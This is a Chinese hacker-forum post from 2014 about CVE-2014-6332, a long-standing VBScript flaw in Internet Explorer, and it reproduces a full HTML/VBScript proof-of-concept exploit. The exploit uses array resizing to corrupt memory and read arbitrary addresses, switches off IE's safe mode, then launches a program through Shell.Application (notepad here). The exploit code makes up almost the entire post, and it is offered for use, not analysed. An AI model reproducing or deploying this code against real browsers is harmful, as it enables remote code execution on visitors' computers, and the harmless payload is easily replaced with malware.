搜索
中国白客联盟»论坛 Techniques 0day及EXP(0day and POC) win95+ie3-win10+ie11全版本执行漏洞
返回列表 发新帖
查看: 617|回复: 0

win95+ie3-win10+ie11全版本执行漏洞

[复制链接]
admin

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2014-11-14 21:00:00 | 显示全部楼层 |阅读模式
微软本月安全更新修复了一个潜藏了18年的IE远程代码执行漏洞(CVE-2014-6332),可以说是给windows吃了一颗大补丸。缺陷出现在VBScript的代码中,自Windows 95首次发布(19年前)以来就一直存在。袁哥的眼泪哗哗的。随便一个ie,必弹计算器。
CVE-2014-6332 alliedve.htm allie(win95+ie3-win10+ie11) dve copy by yuange in 2009
  1. //*
  2.    allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.

  4. https://twitter.com/yuange75


  7. http://hi.baidu.com/yuange1975

  9. *//

  11. <!doctype html>
  12. <html>
  13. <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
  14. <head>
  15. </head>
  16. <body>

  18. <SCRIPT LANGUAGE="VBScript">

  20. function runmumaa()
  21. On Error Resume Next
  22. set shell=createobject("Shell.Application")
  23. shell.ShellExecute "notepad.exe"
  24. end function

  26. </script>

  28. <SCRIPT LANGUAGE="VBScript">

  30. dim   aa()
  31. dim   ab()
  32. dim   a0
  33. dim   a1
  34. dim   a2
  35. dim   a3
  36. dim   win9x
  37. dim   intVersion
  38. dim   rnda
  39. dim   funclass
  40. dim   myarray

  42. Begin()

  44. function Begin()
  45.   On Error Resume Next
  46.   info=Navigator.UserAgent

  48.   if(instr(info,"Win64")>0)   then
  49.      exit   function
  50.   end if

  52.   if (instr(info,"MSIE")>0)   then
  53.              intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
  54.   else
  55.      exit   function  
  56.             
  57.   end if

  59.   win9x=0

  61.   BeginInit()
  62.   If Create()=True Then
  63.      myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
  64.      myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

  66.      if(intVersion<4) then
  67.          document.write("<br> IE")
  68.          document.write(intVersion)
  69.          runshellcode()                    
  70.      else  
  71.           setnotsafemode()
  72.      end if
  73.   end if
  74. end function

  76. function BeginInit()
  77.    Randomize()
  78.    redim aa(5)
  79.    redim ab(5)
  80.    a0=13+17*rnd(6)
  81.    a3=7+3*rnd(5)
  82. end function

  84. function Create()
  85.   On Error Resume Next
  86.   dim i
  87.   Create=False
  88.   For i = 0 To 400
  89.     If Over()=True Then
  90.     '   document.write(i)     
  91.        Create=True
  92.        Exit For
  93.     End If
  94.   Next
  95. end function

  97. sub testaa()
  98. end sub

  100. function mydata()
  101.     On Error Resume Next
  102.      i=testaa
  103.      i=null
  104.      redim  Preserve aa(a2)  
  105.   
  106.      ab(0)=0
  107.      aa(a1)=i
  108.      ab(0)=6.36598737437801E-314

  110.      aa(a1+2)=myarray
  111.      ab(2)=1.74088534731324E-310  
  112.      mydata=aa(a1)
  113.      redim  Preserve aa(a0)  
  114. end function


  117. function setnotsafemode()
  118.     On Error Resume Next
  119.     i=mydata()  
  120.     i=readmemo(i+8)
  121.     i=readmemo(i+16)
  122.     j=readmemo(i+&h134)  
  123.     for k=0 to &h60 step 4
  124.         j=readmemo(i+&h120+k)
  125.         if(j=14) then
  126.               j=0         
  127.               redim  Preserve aa(a2)            
  128.      aa(a1+2)(i+&h11c+k)=ab(4)
  129.               redim  Preserve aa(a0)  

  131.      j=0
  132.               j=readmemo(i+&h120+k)   
  133.          
  134.                Exit for
  135.            end if

  137.     next
  138.     ab(2)=1.69759663316747E-313
  139.     runmumaa()
  140. end function

  142. function Over()
  143.     On Error Resume Next
  144.     dim type1,type2,type3
  145.     Over=False
  146.     a0=a0+a3
  147.     a1=a0+2
  148.     a2=a0+&h8000000
  149.   
  150.     redim  Preserve aa(a0)
  151.     redim   ab(a0)     
  152.   
  153.     redim  Preserve aa(a2)
  154.   
  155.     type1=1
  156.     ab(0)=1.123456789012345678901234567890
  157.     aa(a0)=10
  158.          
  159.     If(IsObject(aa(a1-1)) = False) Then
  160.        if(intVersion<4) then
  161.            mem=cint(a0+1)*16            
  162.            j=vartype(aa(a1-1))
  163.            if((j=mem+4) or (j*8=mem+8)) then
  164.               if(vartype(aa(a1-1))<>0)  Then   
  165.                  If(IsObject(aa(a1)) = False ) Then            
  166.                    type1=VarType(aa(a1))
  167.                  end if               
  168.               end if
  169.            else
  170.              redim  Preserve aa(a0)
  171.              exit  function

  173.            end if
  174.         else
  175.            if(vartype(aa(a1-1))<>0)  Then   
  176.               If(IsObject(aa(a1)) = False ) Then
  177.                   type1=VarType(aa(a1))
  178.               end if               
  179.             end if
  180.         end if
  181.     end if
  182.               
  183.    
  184.     If(type1=&h2f66) Then         
  185.           Over=True      
  186.     End If  
  187.     If(type1=&hB9AD) Then
  188.           Over=True
  189.           win9x=1
  190.     End If  

  192.     redim  Preserve aa(a0)         
  193.         
  194. end function

  196. function ReadMemo(add)
  197.     On Error Resume Next
  198.     redim  Preserve aa(a2)  
  199.   
  200.     ab(0)=0   
  201.     aa(a1)=add+4     
  202.     ab(0)=1.69759663316747E-313      
  203.     ReadMemo=lenb(aa(a1))  
  204.    
  205.     ab(0)=0   

  207.     redim  Preserve aa(a0)
  208. end function

  210. </script>

  212. </body>
  213. </html>
复制代码

原文来自:http://hi.baidu.com/yuange1975/item/c846a94d76fe00a861d7b900
过段时间可能会取消签到功能了
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表